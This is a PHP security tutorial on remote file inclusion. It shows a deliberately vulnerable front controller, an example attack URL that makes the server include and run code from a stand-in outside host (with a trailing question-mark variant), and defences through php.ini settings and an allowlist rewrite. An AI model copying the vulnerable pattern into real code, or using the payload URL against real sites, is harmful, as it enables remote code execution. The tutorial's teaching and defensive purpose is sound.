Remote File Inclusion
A remote file inclusion attack (sometimes abbreviated RFI) exploits a
vulnerability that many people probably do not know of, but it is a very
serious issue that must also be addressed. As the name implies, it occurs when
remote files are included, but what exactly does that mean? Let us look at an
example:

<?php
$page = isset($_GET['page']) ? $_GET['page'] : 'home';
require $page . '.php';
?>

This is a very basic front controller that will forward the request to whatever
file should be responsible for that particular request.
Imagine that a file exists at http://example.com/malice.php and our script
is located at http://site.com/index.php. The attacker will make this request:
http://site.com/index.php?page=http://example.com/malice. This file will get
executed when it is included and it will write a new file to the disk. This file
could be a shell which would allow people to execute commands on the terminal
from it, as well as do other things they should not be able to. Another thing the
attacker can do is set page to http://example.com/malice.php? (note the ending
question mark). That will make whatever follows it part of the query string
and therefore ignored by the server the file is getting included from. Why this is
a security issue should be pretty obvious. People should definitely not be able
to execute whatever commands they want on our server, so how can we prevent
them?
There are a couple of php.ini directives you can use to prevent this:

allow_url_fopen: this directive is set to on by default and it controls whether
remote files should be includable.

allow_url_include: this directive is set to off by default and was introduced in
PHP 5.2. It controls whether include(), require(), include_once()
and require_once() should be able to include remote files. In versions
below PHP 5.2 this was also controlled by allow_url_fopen. Furthermore,
if allow_url_fopen is set to off then this directive will be ignored and set
to off as well.

Basically, those two directives let you set the security settings you need.
Again, no data that does not come from inside your system should be trusted.
You must validate user input and ensure that people cannot enter malformed or
unexpected data.
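
One way to combine the two points above, as an added example that is not part of the original tutorial: the front controller rewritten so that the request value only selects an entry from a fixed allowlist, with a startup check on allow_url_include. The page names, the pages/ directory and the resolve_page() helper are assumptions made for illustration.

```php
<?php
// Added example: hardened form of the front controller shown earlier.
// Page names and the pages/ directory are hypothetical.

// Allowlist: request value => file on disk. User input never reaches require.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Map a requested page name to an absolute path inside $baseDir.
 * Returns null when the name is not on the allowlist or the file is missing.
 */
function resolve_page($requested, string $baseDir): ?string
{
    // Arrays (?page[]=x), URLs and anything else not listed are rejected here.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    // realpath() returns false for a missing file; the prefix comparison
    // confirms the resolved path is still inside the pages directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Defence in depth: refuse to serve if php.ini allows remote includes.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    http_response_code(500);
    exit('allow_url_include must be off');
}

$file = resolve_page($_GET['page'] ?? 'home', __DIR__ . '/pages');
if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}
require $file;
```

With this in place a request such as index.php?page=http://example.com/malice gets a 404, because the value is only ever used as a lookup key.
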
One of our other administrators, Thomas Johnson, has written a small
tutorial about how you can use Apache to block RFI attacks called "Preventing
remote file include attacks with mod_rewrite". You might want to check that out
as well if you are concerned about RFI vulnerabilities.